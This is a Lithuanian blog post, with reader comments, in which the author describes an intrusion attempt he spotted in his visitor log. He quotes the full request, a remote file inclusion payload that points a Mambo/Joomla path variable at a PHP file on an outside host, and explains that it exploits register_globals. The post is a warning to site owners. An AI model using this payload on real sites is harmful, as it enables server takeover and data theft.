Žilvinas Sadauskas - Genialu tai, kas paprasta.

Šį blogą bando nulaužti

Kartas nuo karto nueinu pasižiūrėti, kas šiuo metu naršo mano bloge. Pasižiūriu iš kur atėjo, kokį puslapį žiūri. Įdomu, kai viskas vyksta „on the fly“.

Dabar ką tik prisijungęs pamačiau, kad žmogus/robotas iš šio IP 72.55.143.52 bando laužtis į šį puslapį. Grečiausiai tai daro koks nors script kiddie, nes įvedus šį IP į google, paieškos rezultatuose išmetami access logai su panašiomis atakomis.

Kaip vykdoma ataka.

Į nuorodą yra įvedama štai tokia eilutė

http://www.sadauskas.lt/index.php/category/kompiuterija/programavimas/php/
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&
_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
http://www.pooya.info/images/…/test.txt%3

Iš kintamųjų bandomų perduoti per užklausą spėju, kad bandoma įsibrauti panaudojant kažkokį Mambo/Joomla TVS’o pažeidžiamumą arba tiesiog išnaudoti register_globals on parametrą, jeigu serverio administratorius nekoks specialistas ir palieką jį įjungtą.

Jeigu aš naudočiau Joomla TVS ir serverio parametruose būtų register globals on, tai puslapis įvykdytų PHP kodą, kuris pateiktas šioje nuorodoje http://www.pooya.info/images/…/test.txt

Na, o jeigu jau puslapis jį įvykdytų ir serveris būtų netvarkingai sukonfigūruotas, tai viso gero jūsų duomenims, o gal ir visam serveriui.

Tokių kiber atakų turbūt patiriame kiekvienas, tik dažniausiai jų nepastebime. Būkit atsargūs.



8 Responses to “Šį blogą bando nulaužti”

  1. Vaidas Žilionis Says:

    kiekvieną svetainę eina tiek x užklausų

  2. Andrius (nejau.net) Says:

    Kiekvienas “dirba” savo darbą.

  3. Blogorama #323 : nežinau.lt Says:

    [...] ar kažkokie arabai nelenda į jūsų svetainę md5 kodo tikrinti. Žilvinas rašo, kad bandomas nulaužti ir jo tinklaraštis - ieškant TVS saugumo spragų. Brukalai komentaruose plūste užplūdo Gostik tinklaraštį (vaistai - Akismet, Raven’s [...]

  4. Draugishkas Says:

    wou, whats the point of doing this… nesuprantu

  5. Andrius Kleiva Says:

    Aš irgi jau daug kartų gavęs šitą.

  6. Andrius Says:

    O mano senaji tvs’a neseniai kazkas nulauze. Juokiasi tas, kas paskutinis pasidare back up’a.

  7. Darius Says:

    kam lauztis i kazkoki bloga?? :)

    nebent tam kad ideti pr0n reklama :) apie V1agra.

  8. Eduardas Says:

    Cia matyt Zilvinas papiktino asmenis kazkaip susijusius su Dizaino Kryptimi del to straipsniuko anksciau :) Rengiamas samokslas :D

Leave a Reply

counter